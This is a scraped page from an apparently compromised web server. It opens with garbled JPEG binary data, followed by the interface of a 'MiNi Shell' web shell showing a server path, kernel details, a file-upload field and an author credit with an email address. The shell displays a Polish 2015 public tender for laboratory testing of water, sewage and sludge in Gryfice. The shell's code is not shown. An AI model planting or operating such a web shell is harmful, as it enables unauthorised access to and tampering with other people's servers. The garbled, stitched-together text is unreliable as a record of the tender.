JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151210/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151210/337566-N-2015.html

<p class="kh_header"><b>Gryfice: Pobieranie prób i badania laboratoryjne wraz z opracowaniem wyników, wody uzdatnionej                     i surowej, wód popłucznych, ścieków oczyszczonych i surowych, osadów ściekowych oraz gleb  z rolniczym wykorzystaniem komunalnych osadów ściekowych na potrzeby Zakładu Usług Komunalnych w Gryficach, w roku 2016</b><br>
<b>Numer ogłoszenia: 337566 - 2015; data zamieszczenia: 10.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych w Gryficach , ul. Zielona 5, 72-300 Gryfice, woj. zachodniopomorskie, tel. 91 3842047, faks 91 3842214.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.zgk.gryfice.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pobieranie prób i badania laboratoryjne wraz z opracowaniem wyników, wody uzdatnionej                     i surowej, wód popłucznych, ścieków oczyszczonych i surowych, osadów ściekowych oraz gleb  z rolniczym wykorzystaniem komunalnych osadów ściekowych na potrzeby Zakładu Usług Komunalnych w Gryficach, w roku 2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Specyfika głównych wymagań:
1.	Przedmiotem zamówienia są: pobieranie prób i badania laboratoryjne wraz z opracowaniem 
      wyników, wody uzdatnionej i surowej, wód popłucznych, ścieków oczyszczonych i surowych, 
      sadów ściekowych oraz gleb z rolniczym wykorzystaniem komunalnych osadów ściekowych 
      na potrzeby Zakładu Usług Komunalnych w Gryficach, w roku 2016.
2.	Zakresy rzeczowe i harmonogramy badań określają załączone do formularza cenowo-ofertowego:
a)  Formularz cenowy nr 1 (strony nr 2/17, 3/17 i 4/17) wraz z harmonogramem badań (strony                 
     nr 5/17 i 6/17);
b)  Formularz cenowy nr 2 (strony nr 7/17 i 8/17);
c)  Formularz cenowy nr 3 (strony nr 9/17, 10/17 i 11/17);
      d)  Formularz cenowy nr 4 (strona nr 12/17) wraz z harmonogramem badań (strona nr 13/17);
e)  Formularz cenowy nr 5 (strona nr 14/17);
f)  Formularz cenowy nr 6 (strona nr 15/17) wraz z harmonogramem badań (strona nr 16/17);
g)  Formularz cenowy nr 7 (strona nr 17/17).
Zamawiający wyjaśnia, że harmonogramy badań na stronach nr 5/17 oraz  nr 6/17 formularza cenowo-ofertowego należy traktować jako wzór, który zostanie zmodyfikowany do wersji ostatecznej z chwilą uzgodnienia przez Zamawiającego z PSSE w Gryficach oraz przekazany do realizacji Wykonawcy, z którym zostanie zawarta umowa, po wyborze oferty.   
3.	Zamawiający ustala następujące wymagania dla Wykonawców:
      a) laboratorium lub laboratoria Wykonawcy musi/-szą mieć kompetencje i uprawnienia  
          (akredytacje) do pobierania prób i wykonania wszystkich badań objętych przedmiotem 
          zamówienia, z wyjątkiem określonym w ppkt b), tylko wobec braku akredytacji na badania 
          określone w ppkt b);
      b) dopuszcza się podzlecanie badań laboratoriom innym niż laboratoria Wykonawcy                        
           tylko w zakresie badania następujących parametrów ścieków oczyszczonych:
           DDT- dwuchloro-dwufenylo-trójchloroetan, 
           PCB- wielopierścieniowy chlorowany dwufenyl, 
           PCT- wielopierścieniowy chlorowany trójfenyl, HCH- heksachlorocykloheksan, 
           aldryny, dieldryny, endryny, izodryny.
4.	Wykonawca zobowiązuje się do wykonania własnymi siłami wszystkich badań, do których     
      posiada kompetencje i uprawnienia (akredytacje), o których mowa w pkt 3 a).     
5.	W zakresie rodzaju i harmonogramu badań przedmiot zamówienia został opisany                           
      w załącznikach do niniejszego zapytania ofertowego. Dodatkowo w cenę oferty należy 
      wliczyć koszty przejazdów do i z miejsca pobrania prób oraz badań.
6.	Metodyka badań:
-	Badania wody należy przeprowadzić zgodnie z wymaganiami i normami zawartymi                            
     w Rozporządzeniu Ministra Zdrowia z dnia 13 listopada 2015 r. w sprawie jakości wody 
            przeznaczonej do spożycia przez ludzi (Dz. U. poz. 1989);
-	Badania ścieków i wód popłucznych należy przeprowadzić zgodnie z wymaganiami                         
     i normami zawartymi w Rozporządzeniu Ministra Środowiska z dnia 18 listopada 2014 r.                   
     w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód                             
     lub do ziemi,  oraz w sprawie substancji szczególnie szkodliwych dla środowiska    
     wodnego (Dz. U. poz. 1800);
-	Badania komunalnego osadu ściekowego należy przeprowadzić zgodnie                                        
      z Rozporządzeniem Ministra Środowiska z dnia 6 lutego 2015 r. w sprawie komunalnych  
      osadów ściekowych (Dz. U. poz. 257). 
7.	Wzór umowy stanowi załącznik nr 2 do zapytania ofertowego.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Zamawiający wymaga, aby każda oferta zawierała wypełniony i podpisany przez Wykonawcę formularz cenowo-ofertowy wraz z kompletem formularzy cenowych nr 1-7 (załącznik nr 1                       do niniejszego zapytania ofertowego) bez harmonogramów, tj.  tabeli nr 1-4.
2.	Dodatkowo do oferty Wykonawca załącza oświadczenie o spełnianiu warunków udziału                 w postępowaniu wg załączonego wzoru - załącznik nr 3 do zapytania ofertowego (zamiast oświadczenia, o którym mowa w pkt III.4.1)), oraz na potwierdzenie spełniania tych warunków:
      a) uprawnienia do pobierania prób, w szczególności kopię lub kopie zaświadczenia/-eń 
          potwierdzającego/-ych przeszkolenie próbkobiorcy/-ów w zakresie poboru próbek wody 
          przeznaczonej do spożycia przez ludzi;
b) uprawnienia do badań jakości wody przeznaczonej do spożycia przez ludzi (uzdatnionej               
    i surowej), zgodnie z art. 12 ust. 4 ustawy o zbiorowym zaopatrzeniu w wodę i zbiorowym 
    odprowadzaniu ścieków (tekst jedn. Dz. U. z 2006 r. Nr 123, poz. 858 ze zm.),                                 
    w szczególności kopię lub kopie aktualnej/-ych decyzji Państwowej Inspekcji Sanitarnej 
    zatwierdzającej/-ych laboratorium/-a do pobierania prób i wykonywania badań wody 
    przeznaczonej do spożycia przez ludzi w zakresie parametrów będących przedmiotem 
    zamówienia;                 
      c) uprawnienia do badań jakości wód popłucznych, ścieków oczyszczonych i surowych, 
          osadów ściekowych, zgodne z art. 147a ustawy Prawo ochrony środowiska (tekst jedn.                 
          Dz. U. z 2013 r. poz. 1232 ze zm.), w szczególności kopię lub kopie aktualnego/-ych 
          certyfikatu/-ów akredytacji laboratorium/-ów oraz kopię lub kopie wyciągu z zakresu 
          akredytacji laboratorium/-ów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.zgk.gryfice.eu/strony/996.dhtml<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Usług Komunalnych w Gryficach, ul. Zielona 5, 72-300 Gryfice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2015 godzina 10:00, miejsce: budynek Zarządu Zakładu Uslug Komunalnych w Gryficach, ul. Zielona 5, 72-300 Gryfice, sekretariat, pok. nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 16.01.2016.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com